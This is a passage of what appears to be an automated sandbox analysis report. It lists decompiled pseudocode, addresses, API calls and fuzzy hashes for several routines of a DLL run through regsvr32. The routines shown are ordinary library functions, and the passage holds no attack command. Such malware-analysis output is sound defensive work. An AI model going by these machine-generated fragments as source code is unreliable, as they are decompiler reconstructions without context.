				L100013E3( *((intOrPtr*)(_t149 - 0x18)) + 0xfffffff0, _t143);
				_t111 =  *(_t149 - 0x1c);
				E10017880(_t148 + 0xf4,  *(_t149 - 0x1c));
				InvalidateRect( *(_t148 + 0x114), 0, 1);
				_push( *((intOrPtr*)(_t149 + 0x10)));
				_push( *((intOrPtr*)(_t149 + 0xc)));
				E1001468A( *(_t149 - 0x1c), _t148, _t146, _t149,  *((intOrPtr*)(_t149 + 8)));
				return E10047725(L100013E3(_t111 - 0x10, _t143));
			}













                                                                                                                0x10001159
                                                                                                                0x10001159
                                                                                                                0x1000888a
                                                                                                                0x10008891
                                                                                                                0x10008896
                                                                                                                0x10008898
                                                                                                                0x1000889b
                                                                                                                0x1000889d
                                                                                                                0x1000889f
                                                                                                                0x1000889f
                                                                                                                0x100088aa
                                                                                                                0x100088af
                                                                                                                0x100088b8
                                                                                                                0x100088ca
                                                                                                                0x100088dc
                                                                                                                0x100088ef
                                                                                                                0x100088f1
                                                                                                                0x100088f7
                                                                                                                0x100088fd
                                                                                                                0x10008980
                                                                                                                0x1000898f
                                                                                                                0x1000899e
                                                                                                                0x100089a0
                                                                                                                0x100089a1
                                                                                                                0x100088ff
                                                                                                                0x1000891d
                                                                                                                0x1000892d
                                                                                                                0x10008936
                                                                                                                0x10008946
                                                                                                                0x10008959
                                                                                                                0x10008966
                                                                                                                0x10008968
                                                                                                                0x10008969
                                                                                                                0x10008969
                                                                                                                0x100089a7
                                                                                                                0x100089b0
                                                                                                                0x100089c0
                                                                                                                0x100089c6
                                                                                                                0x100089cc
                                                                                                                0x100089ce
                                                                                                                0x100089d2
                                                                                                                0x100089d7
                                                                                                                0x100089d7
                                                                                                                0x100089e0
                                                                                                                0x100089ee
                                                                                                                0x100089f3
                                                                                                                0x100089f7
                                                                                                                0x100089f9
                                                                                                                0x100089fd
                                                                                                                0x10008a01
                                                                                                                0x10008a11
                                                                                                                0x10008a15
                                                                                                                0x10008a23
                                                                                                                0x10008a27
                                                                                                                0x10008a2c
                                                                                                                0x10008a36
                                                                                                                0x10008a45
                                                                                                                0x10008a47
                                                                                                                0x10008a4c
                                                                                                                0x10008a52
                                                                                                                0x10008a64

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10008891
                                                                                                                • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 1000891D
                                                                                                                • ColorHLSToRGB.SHLWAPI(?,000000F0,?), ref: 10008930
                                                                                                                • ColorRGBToHLS.SHLWAPI(?,?,?,?), ref: 1000898F
                                                                                                                  • Part of subcall function 10017880: IsWindow.USER32(?), ref: 1001788F
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 100089CC
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 10008A45
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$InvalidateRect$H_prolog3Window
                                                                                                                • String ID: Similar to %s
                                                                                                                • API String ID: 672627570-2607584825
                                                                                                                • Opcode ID: 90e863712b9378eaa31c1de6765e72d0314f254249c93e764973403c218e9bde
                                                                                                                • Instruction ID: de33df7f9b91231e11840ea7327c0f422b70cc99c18facc103235999ff5a89ae
                                                                                                                • Opcode Fuzzy Hash: 90e863712b9378eaa31c1de6765e72d0314f254249c93e764973403c218e9bde
                                                                                                                • Instruction Fuzzy Hash: 95519F759002499FEB15DBB4CC95BFEBBF4FF04340F00452DF5A6A6195DA74AA44CB20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100264D2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E100264D2(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t32;
				void* _t34;
				intOrPtr _t35;
				char* _t36;
				int _t38;
				CHAR* _t40;
				CHAR* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				CHAR* _t54;
				void* _t56;
				int _t57;
				intOrPtr _t58;
				void* _t62;

				_t52 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(_t45);
				_push(_t56);
				_t54 = _a4;
				_push(0xffffffff);
				_t32 = E1002218F(_t54);
				_t67 = _t32;
				if(_t32 == 0) {
					E1000A069(_t45, __ecx, _t54, _t56, _t67);
				}
				_t57 = lstrlenA(_t54);
				_v8 = _t57;
				_t34 = E10034516(_t54, 0, 0);
				_t51 = _v8;
				_t47 = _t34 - 1;
				_t58 = _t57 - _t47;
				_t35 = _t58 + _t54;
				_v12 = _t35;
				if(_a8 < _t51) {
					if(_a8 >= _t47) {
						__eflags =  *_t54 - 0x5c;
						_t36 =  &(_t54[2]);
						_a4 = _t36;
						if( *_t54 == 0x5c) {
							__eflags = _t54[1] - 0x5c;
							if(_t54[1] == 0x5c) {
								while(1) {
									__eflags =  *_t36 - 0x5c;
									if( *_t36 == 0x5c) {
										goto L13;
									}
									_t36 = L1004CFCE(_t52, _t54, _a4);
									_pop(_t51);
									_a4 = _t36;
								}
							}
						}
						L13:
						__eflags = _t58 - 3;
						if(_t58 > 3) {
							do {
								_t43 = L1004CFCE(_t52, _t54, _a4);
								__eflags =  *_t43 - 0x5c;
								_a4 = _t43;
								_pop(_t51);
							} while ( *_t43 != 0x5c);
						}
						_t58 = _a4 - _t54;
						__eflags = _a8 - _t58 + _t47 + 5;
						if(_a8 >= _t58 + _t47 + 5) {
							_t49 = lstrlenA;
							while(1) {
								_t38 = lstrlenA(_a4);
								__eflags = _t38 + _t58 + 4 - _a8;
								if(_t38 + _t58 + 4 > _a8) {
									goto L18;
								} else {
									break;
								}
								do {
									L18:
									_t40 = L1004CFCE(_t52, _t54, _a4);
									__eflags =  *_t40 - 0x5c;
									_pop(_t51);
									_a4 = _t40;
								} while ( *_t40 != 0x5c);
							}
							__eflags = _t58;
							if(_t58 < 0) {
								L22:
								_t58 = _a8;
							} else {
								__eflags = _t58 - _a8;
								if(_t58 >= _a8) {
									goto L22;
								}
							}
							_t61 = _t58 + _t54;
							__eflags = _t58 + _t54;
							_push(E10047757(_t49, _t51, _t58 + _t54, 5, "\\...", 5));
							L1000135C(_t49, _t51, _t54, _t61);
							_t35 = E10026487(_t49, _t52, _t54, _t61, _t62, _t54, _v8, _a4);
						} else {
							_push(_v12);
							_push(_v8);
							goto L7;
						}
					} else {
						if(_a12 != 0) {
							_push(_t35);
							_push(_t51);
							L7:
							_push(_t54);
							_t35 = E10019530(_t47, _t52, _t54, _t58, _t62);
						} else {
							 *_t54 = 0;
						}
					}
				}
				return _t35;
			}


























                                                                                                                0x100264d2
                                                                                                                0x100264d5
                                                                                                                0x100264d6
                                                                                                                0x100264d7
                                                                                                                0x100264d8
                                                                                                                0x100264da
                                                                                                                0x100264dd
                                                                                                                0x100264e0
                                                                                                                0x100264e5
                                                                                                                0x100264e7
                                                                                                                0x100264e9
                                                                                                                0x100264e9
                                                                                                                0x100264f9
                                                                                                                0x100264fc
                                                                                                                0x100264ff
                                                                                                                0x10026504
                                                                                                                0x10026509
                                                                                                                0x1002650a
                                                                                                                0x1002650f
                                                                                                                0x10026512
                                                                                                                0x10026515
                                                                                                                0x1002651e
                                                                                                                0x1002653e
                                                                                                                0x10026541
                                                                                                                0x10026544
                                                                                                                0x10026547
                                                                                                                0x10026549
                                                                                                                0x1002654d
                                                                                                                0x1002655d
                                                                                                                0x1002655d
                                                                                                                0x10026560
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10026554
                                                                                                                0x10026559
                                                                                                                0x1002655a
                                                                                                                0x1002655a
                                                                                                                0x1002655d
                                                                                                                0x1002654d
                                                                                                                0x10026562
                                                                                                                0x10026562
                                                                                                                0x10026565
                                                                                                                0x10026567
                                                                                                                0x1002656a
                                                                                                                0x1002656f
                                                                                                                0x10026572
                                                                                                                0x10026575
                                                                                                                0x10026575
                                                                                                                0x10026567
                                                                                                                0x1002657b
                                                                                                                0x10026581
                                                                                                                0x10026584
                                                                                                                0x1002658e
                                                                                                                0x100265a7
                                                                                                                0x100265aa
                                                                                                                0x100265b0
                                                                                                                0x100265b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10026596
                                                                                                                0x10026596
                                                                                                                0x10026599
                                                                                                                0x1002659e
                                                                                                                0x100265a1
                                                                                                                0x100265a2
                                                                                                                0x100265a2
                                                                                                                0x10026596
                                                                                                                0x100265b5
                                                                                                                0x100265b7
                                                                                                                0x100265be
                                                                                                                0x100265be
                                                                                                                0x100265b9
                                                                                                                0x100265b9
                                                                                                                0x100265bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100265bc
                                                                                                                0x100265ca
                                                                                                                0x100265ca
                                                                                                                0x100265d2
                                                                                                                0x100265d3
                                                                                                                0x100265df
                                                                                                                0x10026586
                                                                                                                0x10026586
                                                                                                                0x10026589
                                                                                                                0x00000000
                                                                                                                0x10026589
                                                                                                                0x10026520
                                                                                                                0x10026524
                                                                                                                0x1002652e
                                                                                                                0x1002652f
                                                                                                                0x10026530
                                                                                                                0x10026530
                                                                                                                0x10026531
                                                                                                                0x10026526
                                                                                                                0x10026526
                                                                                                                0x10026526
                                                                                                                0x10026524
                                                                                                                0x1002651e
                                                                                                                0x100265eb

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,?,000000FF), ref: 100264EF
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                  • Part of subcall function 10019530: _strcpy_s.LIBCMT ref: 1001953C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                                                                                                                • String ID: \...
                                                                                                                • API String ID: 2411880420-1167917071
                                                                                                                • Opcode ID: 425b97c66bdc159ad821b8e1400f97d195f5a1d0c922c3df5298d3a716972ff9
                                                                                                                • Instruction ID: 4e355dd1eabe12f8d297b596017aaa3e0ceaf742dabed09d1a5a97fc94068f4e
                                                                                                                • Opcode Fuzzy Hash: 425b97c66bdc159ad821b8e1400f97d195f5a1d0c922c3df5298d3a716972ff9
                                                                                                                • Instruction Fuzzy Hash: 1E310776800A59FFEF11CF50EC80E9E7BA4EF09390F518126F9045A155E734EE90CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004C95A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 20%
                                                                                                                			E1004C95A(void* __edx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				DWORD* _t25;
				intOrPtr* _t27;
				char _t41;
				void* _t44;

				_t41 = _a12;
				_t48 = _t41;
				_v8 = 0;
				if(_t41 != 0) {
					E10051513();
					_t44 = E1005496F(1, 0x214);
					__eflags = _t44;
					if(__eflags == 0) {
						L7:
						_push(_t44);
						E100470E9(0, _t41, _t44, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E100490BD(_v8);
						}
						_t20 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E100516CA(__edx, _t41, __eflags) + 0x6c)));
						_push(_t44);
						E10051593(0, _t41, _t44, __eflags);
						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
						_t25 = _a24;
						__eflags = _t25;
						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
						if(_t25 == 0) {
							_t25 =  &_a12;
						}
						_t20 = CreateThread(_a4, _a8, "V�3L", _t44, _a20, _t25);
						__eflags = _t20;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L7;
						}
					}
				} else {
					_t27 = E10049097(_t48);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t27 = 0x16;
					E10050228(0, __edx, _t41);
					_t20 = 0;
				}
				return _t20;
			}













                                                                                                                0x1004c960
                                                                                                                0x1004c965
                                                                                                                0x1004c967
                                                                                                                0x1004c96a
                                                                                                                0x1004c989
                                                                                                                0x1004c99a
                                                                                                                0x1004c99c
                                                                                                                0x1004c9a0
                                                                                                                0x1004c9ec
                                                                                                                0x1004c9ec
                                                                                                                0x1004c9ed
                                                                                                                0x1004c9f2
                                                                                                                0x1004c9f6
                                                                                                                0x1004c9fb
                                                                                                                0x1004ca00
                                                                                                                0x1004ca01
                                                                                                                0x1004ca01
                                                                                                                0x1004c9a2
                                                                                                                0x1004c9a7
                                                                                                                0x1004c9aa
                                                                                                                0x1004c9ab
                                                                                                                0x1004c9b3
                                                                                                                0x1004c9b7
                                                                                                                0x1004c9ba
                                                                                                                0x1004c9bd
                                                                                                                0x1004c9c1
                                                                                                                0x1004c9c4
                                                                                                                0x1004c9c6
                                                                                                                0x1004c9c6
                                                                                                                0x1004c9d9
                                                                                                                0x1004c9df
                                                                                                                0x1004c9e1
                                                                                                                0x1004c9e9
                                                                                                                0x00000000
                                                                                                                0x1004c9e9
                                                                                                                0x1004c9e1
                                                                                                                0x1004c96c
                                                                                                                0x1004c96c
                                                                                                                0x1004c971
                                                                                                                0x1004c972
                                                                                                                0x1004c973
                                                                                                                0x1004c974
                                                                                                                0x1004c975
                                                                                                                0x1004c976
                                                                                                                0x1004c97c
                                                                                                                0x1004c984
                                                                                                                0x1004c984
                                                                                                                0x1004ca07

                                                                                                                APIs
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 1004C989
                                                                                                                • __calloc_crt.LIBCMT ref: 1004C995
                                                                                                                • __initptd.LIBCMT ref: 1004C9AB
                                                                                                                • CreateThread.KERNEL32(?,?,V3L,00000000,?,1001A92A), ref: 1004C9D9
                                                                                                                • GetLastError.KERNEL32(?,74EC13E0,00000000,?,?,1001A92A,?,?,1001A795,?,?,?), ref: 1004C9E3
                                                                                                                • __dosmaperr.LIBCMT ref: 1004C9FB
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                  • Part of subcall function 10050228: __decode_pointer.LIBCMT ref: 10050231
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit__initptd
                                                                                                                • String ID: V3L
                                                                                                                • API String ID: 351847049-3255255363
                                                                                                                • Opcode ID: 748ffce91294342a7963a33e7aed7659759132f52b9a136788063b1aadd5af63
                                                                                                                • Instruction ID: c8a5434d33938f88e35a92148a5fc1000c2d0eb089d5c1984149bf7f72176d94
                                                                                                                • Opcode Fuzzy Hash: 748ffce91294342a7963a33e7aed7659759132f52b9a136788063b1aadd5af63
                                                                                                                • Instruction Fuzzy Hash: F811BC76505209AFDB50EFA4DC86CCEBBE5EF042A8B21043AF541D2091EB31AD108AA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002E2C0 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E1002E2C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t184;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1004764D(0x10090312, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E1002C64F(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x100a5d5c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L47:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L53:
										return E10047725(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										_t184 =  *_t127;
										 *((intOrPtr*)(_t184 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L47;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x100a604c, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							}
							__eflags = _t222;
							if(__eflags != 0) {
								L10022E9A(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
								 *(_t224 - 4) = 0;
								E10021EF1(_t224 - 0x2c, _t224 - 0x74);
								_t158 =  *(_t224 + 8);
								_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
								_t47 = _t224 - 4;
								 *_t47 =  *(_t224 - 4) | 0xffffffff;
								__eflags =  *_t47;
								 *(_t224 - 0x10) = _t159;
								L10022DDA(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
							} else {
								_t161 =  *(_t224 + 8);
								 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
							}
							_t129 =  *(_t224 + 8);
							goto L38;
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x100a605c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E1002C456(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x100a48ac, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L53;
				}
				goto L2;
			}












































                                                                                                                0x1002e2c0
                                                                                                                0x1002e2c7
                                                                                                                0x1002e2cc
                                                                                                                0x1002e2ce
                                                                                                                0x1002e2d3
                                                                                                                0x1002e2d8
                                                                                                                0x1002e2db
                                                                                                                0x1002e2fc
                                                                                                                0x1002e302
                                                                                                                0x1002e305
                                                                                                                0x1002e308
                                                                                                                0x1002e30b
                                                                                                                0x1002e314
                                                                                                                0x1002e31c
                                                                                                                0x1002e31f
                                                                                                                0x1002e352
                                                                                                                0x1002e352
                                                                                                                0x1002e357
                                                                                                                0x1002e3bc
                                                                                                                0x1002e3bf
                                                                                                                0x1002e42b
                                                                                                                0x1002e42b
                                                                                                                0x1002e42f
                                                                                                                0x1002e439
                                                                                                                0x1002e43b
                                                                                                                0x1002e43d
                                                                                                                0x1002e58c
                                                                                                                0x1002e58f
                                                                                                                0x1002e5a9
                                                                                                                0x1002e5a9
                                                                                                                0x1002e5ae
                                                                                                                0x1002e5b3
                                                                                                                0x1002e5b3
                                                                                                                0x1002e5b9
                                                                                                                0x1002e5c0
                                                                                                                0x1002e5c0
                                                                                                                0x1002e5c7
                                                                                                                0x1002e5ca
                                                                                                                0x1002e5cf
                                                                                                                0x1002e5cf
                                                                                                                0x1002e591
                                                                                                                0x1002e591
                                                                                                                0x1002e595
                                                                                                                0x1002e59c
                                                                                                                0x1002e59f
